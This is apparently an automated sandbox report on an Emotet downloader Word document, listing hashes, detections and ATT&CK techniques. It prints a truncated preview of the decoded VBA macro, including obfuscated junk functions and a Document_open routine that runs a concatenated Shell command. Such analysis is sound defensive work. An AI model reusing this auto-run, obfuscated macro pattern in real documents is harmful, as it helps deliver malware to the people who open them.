Emotet Office (OLE) malware analysis — malicious · 3b54f67df383e30b

MALICIOUS

Office (OLE)

317.0 KB Created: 2018-07-19 15:10:00 Authoring application: Microsoft Office Word First seen: 2018-11-13

MD5: 12a82ff7b7ce9c868e71f98fb7601830 SHA-1: 93c8bc3d33cd87e55942b5be425e5b0f9e35fb09 SHA-256: 3b54f67df383e30b7d667fd1fc714c8edc04de98b45e2ad6bcaade47db04651b

182 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment T1105 Ingress Tool Transfer

The critical ClamAV heuristic identifies this file as Doc.Downloader.Emotet-6877454-0, a known Emotet downloader. The presence of a Document_Open macro and a Shell() call within the VBA code strongly indicates that the macro is designed to execute a secondary payload. The VBA code itself is heavily obfuscated, but the overall behavior points to a downloader attempting to fetch and run additional malicious content.

Heuristics 5

ClamAV: Doc.Downloader.Emotet-6877454-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6877454-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 34333 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	34333 bytes
SHA-256: `cd24e295750bc0d5ff5bb97d7803952b219446271a02532f5ed59656deb04a72`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "fEzkTrGMh" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function ZhNziTowt() On Error Resume Next hPJlAK = 77999 / sahvX - (LfuvDW - jOtkpF) / 99218 / PiznB * zPOKQw * HVzMi FPlLi = 74338 / AQAKEo - (csiHVz - QjlnZ) / 82575 / tvYHTZ * AzoJP * zwNzLH GmMMXM = 78805 / zBwwj - (zuoiD - wDkoH) / 57034 / LKDSn * qIXJqE * sIXQbi kZASqv = 67753 / CYFuG - (HujLYs - akzaPO) / 77160 / TNZzKa * CzwfHF * llKjO End Function Private Function BfCTzRUPBvCMQX() On Error Resume Next Ftddik = 82522 / StBNv - (NiTkqi - EinTm) / 77076 / TmqEkL * whjGCi * uMzos OJzLI = 43888 / wmpOT - (spzfwQ - jUjuJz) / 83668 / IQQiNa * LqTlIz * ZjoAJ zZUCQZ = 3181 / qJswz - (jDzdj - OAninw) / 92244 / Vqiuf * VMWCU * tnrWNF fWoLi = 4421 / iljRPB - (aDXSiK - ZbKqA) / 95792 / Mwwvo * waXbV * FYhQzF Uwpwt = 1287 / FuiVdE - (SomWa - hzfwwf) / 9259 / sLKkm * sNGwC * pqjtFs End Function Private Function PFMoLojAXEv() On Error Resume Next oFKfVu = 33063 / ILbbs - (PzFSs - LkEZG) / 45031 / uOGbhj * XARAvc * uDPwN OTkUjk = 49290 / OKiMiw - (GiTLP - biFdz) / 5851 / hjrAu * zVPwM * IYCuG kKUcYT = 99113 / VValiO - (PwfwvL - tLTNsY) / 79989 / GbjQW * DMaYpo * zwMlK jTMJt = 61873 / jnkiq - (hYNiSh - Kzzrj) / 14303 / HlYozs * WhUWwU * mJllI jzHSS = 44698 / EAkYzP - (uBjuu - lPhFXP) / 19723 / jpctb * KQzJPJ * Tzjbz VbDlP = 65814 / uuzGKQ - (SlbRj - PjTuiO) / 36558 / zQETP * dlwasb * jVHGi ROwnO = 52010 / pIIGBP - (zismu - njpBYE) / 85867 / KMozSv * iTREoz * dnTrMs End Function Private Function zWXOjOtKrs() On Error Resume Next FpivLm = 95097 / tDDiZ - (GHTGAc - KLYJlS) / 70365 / cczGX * WsYhi * aAjFJ TfYoO = 16744 / viKmZT - (qRaEX - rjOvY) / 42866 / ZKcSz * KQkDol * aFshmH XzUmR = 47278 / LHFtS - (YASsV - RAqMWV) / 47549 / INaJbz * Ufufid * nPsdF ObRVt = 97283 / hnwQs - (FzhwSS - DUYNr) / 39598 / MaTsQ * jumJn * AansvO End Function Private Function jIBlFQjQdQrw() On Error Resume Next zYqSMO = 65026 / viNEN - (wVEvjk - zJXjP) / 47363 / dTYuz * EqSQYL * FJSSpk JlHNs = 85959 / vTwUF - (rWjCbB - rLVBHs) / 52757 / ScBUXp * RlAwr * cuHCEW JBWbF = 315 / infJA - (BHDiNB - uOWJW) / 83296 / PIikZ * NEzfu * czRvzO GjSqw = 30829 / QGGzRd - (rzAhvS - uCfKp) / 29484 / OwCVD * LwidYZ * BftwaP wqCfo = 51506 / OSizp - (fbFTH - rGDoX) / 47443 / OoqFt * sOjcWP * WDbAh BrmwJw = 10837 / mSZbl - (hIQMEq - TROXtj) / 38012 / XtzDU * qzLAJi * WiLif UAftjK = 66256 / YYQPln - (ZaXRA - JELvMF) / 94376 / CsNokF * NFWKI * bmjts End Function Private Sub Document_open() On Error Resume Next aPWzuR = (NvRzi - FVojC) - (nNMDrr - vEzbzP + SJmzD + cGRUQ) spkWh = (WKlKdI - clUGjJ) - (zwXmr - kBWBI + ViQicP + NPzVYX) BCwzZ = (hVJsCA - DzXIj) - (ujlEU - FAwvs + qVbGR + bZoKUi) zaRMLT = (hiDnW - SAShz) - (ioFYR - IUiYz + sqoOfO + zXjwsi) Shell "" + HuIlVojjO + GzVKNUShJAv + CVar("c") + foFjwrmMGfoKr + bljvaVwPGvD + cHAzzrj + tmXDfnB + wqKCms + KEjzsKO + UOzcNzsX + sYtSdSiOcsN + lhIzbo + DtBBY + wvcjUA + wjMHiwN + NVXGizzwAuX + zCuLCCQa + QwYMoJPAs + csUviaRfLikwil, 0 dkLGh = (qoDajE - aUjqS) - (iFscu - rSjjA + aGzmQh + QmCfs) End Sub Private Function wUOYhPlzmQ() On Error Resume Next RLFKNK = (YVjJO - iCcRuL) - (FOEqt - buLPll + MmKNN + ELEXjJ) hkVUj = (XTRFs - WuIomQ) - (LlRGT - GRmFk + NoYQYf + fYnTwC) wwNVC = (RolcmX - hNYFw) - (LlhrUa - zIAwMi + mQHFl + JZjwwH) SPwRr = (sbCGO - OiJMG) - (YrTvrO - SGtAq + hZtIi + zuZfk) ESkYl = (vpjZW - HVJbkb) - (kwXIV - DWSXoO + csQSi + ARYjmX) End Function Private Function PRsJjDaUPd() On Error Resume Next jjAwZD = (wZuYo - QAFvVt) - (dqijiw - LBMZt + RodaS + KBEVjD) GvlwA = (dOQwqd - CKGwC) - (fjKtz - DSHdmj + YNACWi + oAkHcl) cKJHO = (rQJii - bGliU) - (qCSwl - zIboP + wXacHh + NjEWr) NCaHU = (uovBmz - IVkiSQ) - (MBHkS - MfzDR + WvEED + LjdYEB) lFMwMp = ( ... (truncated)

SHA-256: cd24e295750bc0d5ff5bb97d7803952b219446271a02532f5ed59656deb04a72

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "fEzkTrGMh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function ZhNziTowt()
On Error Resume Next
   hPJlAK = 77999 / sahvX - (LfuvDW - jOtkpF) / 99218 / PiznB * zPOKQw * HVzMi
   FPlLi = 74338 / AQAKEo - (csiHVz - QjlnZ) / 82575 / tvYHTZ * AzoJP * zwNzLH
   GmMMXM = 78805 / zBwwj - (zuoiD - wDkoH) / 57034 / LKDSn * qIXJqE * sIXQbi
   kZASqv = 67753 / CYFuG - (HujLYs - akzaPO) / 77160 / TNZzKa * CzwfHF * llKjO
End Function
Private Function BfCTzRUPBvCMQX()
On Error Resume Next
   Ftddik = 82522 / StBNv - (NiTkqi - EinTm) / 77076 / TmqEkL * whjGCi * uMzos
   OJzLI = 43888 / wmpOT - (spzfwQ - jUjuJz) / 83668 / IQQiNa * LqTlIz * ZjoAJ
   zZUCQZ = 3181 / qJswz - (jDzdj - OAninw) / 92244 / Vqiuf * VMWCU * tnrWNF
   fWoLi = 4421 / iljRPB - (aDXSiK - ZbKqA) / 95792 / Mwwvo * waXbV * FYhQzF
   Uwpwt = 1287 / FuiVdE - (SomWa - hzfwwf) / 9259 / sLKkm * sNGwC * pqjtFs
End Function
Private Function PFMoLojAXEv()
On Error Resume Next
   oFKfVu = 33063 / ILbbs - (PzFSs - LkEZG) / 45031 / uOGbhj * XARAvc * uDPwN
   OTkUjk = 49290 / OKiMiw - (GiTLP - biFdz) / 5851 / hjrAu * zVPwM * IYCuG
   kKUcYT = 99113 / VValiO - (PwfwvL - tLTNsY) / 79989 / GbjQW * DMaYpo * zwMlK
   jTMJt = 61873 / jnkiq - (hYNiSh - Kzzrj) / 14303 / HlYozs * WhUWwU * mJllI
   jzHSS = 44698 / EAkYzP - (uBjuu - lPhFXP) / 19723 / jpctb * KQzJPJ * Tzjbz
   VbDlP = 65814 / uuzGKQ - (SlbRj - PjTuiO) / 36558 / zQETP * dlwasb * jVHGi
   ROwnO = 52010 / pIIGBP - (zismu - njpBYE) / 85867 / KMozSv * iTREoz * dnTrMs
End Function
Private Function zWXOjOtKrs()
On Error Resume Next
   FpivLm = 95097 / tDDiZ - (GHTGAc - KLYJlS) / 70365 / cczGX * WsYhi * aAjFJ
   TfYoO = 16744 / viKmZT - (qRaEX - rjOvY) / 42866 / ZKcSz * KQkDol * aFshmH
   XzUmR = 47278 / LHFtS - (YASsV - RAqMWV) / 47549 / INaJbz * Ufufid * nPsdF
   ObRVt = 97283 / hnwQs - (FzhwSS - DUYNr) / 39598 / MaTsQ * jumJn * AansvO
End Function
Private Function jIBlFQjQdQrw()
On Error Resume Next
   zYqSMO = 65026 / viNEN - (wVEvjk - zJXjP) / 47363 / dTYuz * EqSQYL * FJSSpk
   JlHNs = 85959 / vTwUF - (rWjCbB - rLVBHs) / 52757 / ScBUXp * RlAwr * cuHCEW
   JBWbF = 315 / infJA - (BHDiNB - uOWJW) / 83296 / PIikZ * NEzfu * czRvzO
   GjSqw = 30829 / QGGzRd - (rzAhvS - uCfKp) / 29484 / OwCVD * LwidYZ * BftwaP
   wqCfo = 51506 / OSizp - (fbFTH - rGDoX) / 47443 / OoqFt * sOjcWP * WDbAh
   BrmwJw = 10837 / mSZbl - (hIQMEq - TROXtj) / 38012 / XtzDU * qzLAJi * WiLif
   UAftjK = 66256 / YYQPln - (ZaXRA - JELvMF) / 94376 / CsNokF * NFWKI * bmjts
End Function
Private Sub Document_open()
On Error Resume Next
   aPWzuR = (NvRzi - FVojC) - (nNMDrr - vEzbzP + SJmzD + cGRUQ)
   spkWh = (WKlKdI - clUGjJ) - (zwXmr - kBWBI + ViQicP + NPzVYX)
   BCwzZ = (hVJsCA - DzXIj) - (ujlEU - FAwvs + qVbGR + bZoKUi)
   zaRMLT = (hiDnW - SAShz) - (ioFYR - IUiYz + sqoOfO + zXjwsi)
Shell "" + HuIlVojjO + GzVKNUShJAv + CVar("c") + foFjwrmMGfoKr + bljvaVwPGvD + cHAzzrj + tmXDfnB + wqKCms + KEjzsKO + UOzcNzsX + sYtSdSiOcsN + lhIzbo + DtBBY + wvcjUA + wjMHiwN + NVXGizzwAuX + zCuLCCQa + QwYMoJPAs + csUviaRfLikwil, 0
   dkLGh = (qoDajE - aUjqS) - (iFscu - rSjjA + aGzmQh + QmCfs)
End Sub
Private Function wUOYhPlzmQ()
On Error Resume Next
   RLFKNK = (YVjJO - iCcRuL) - (FOEqt - buLPll + MmKNN + ELEXjJ)
   hkVUj = (XTRFs - WuIomQ) - (LlRGT - GRmFk + NoYQYf + fYnTwC)
   wwNVC = (RolcmX - hNYFw) - (LlhrUa - zIAwMi + mQHFl + JZjwwH)
   SPwRr = (sbCGO - OiJMG) - (YrTvrO - SGtAq + hZtIi + zuZfk)
   ESkYl = (vpjZW - HVJbkb) - (kwXIV - DWSXoO + csQSi + ARYjmX)
End Function
Private Function PRsJjDaUPd()
On Error Resume Next
   jjAwZD = (wZuYo - QAFvVt) - (dqijiw - LBMZt + RodaS + KBEVjD)
   GvlwA = (dOQwqd - CKGwC) - (fjKtz - DSHdmj + YNACWi + oAkHcl)
   cKJHO = (rQJii - bGliU) - (qCSwl - zIboP + wXacHh + NjEWr)
   NCaHU = (uovBmz - IVkiSQ) - (MBHkS - MfzDR + WvEED + LjdYEB)
   lFMwMp = (
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.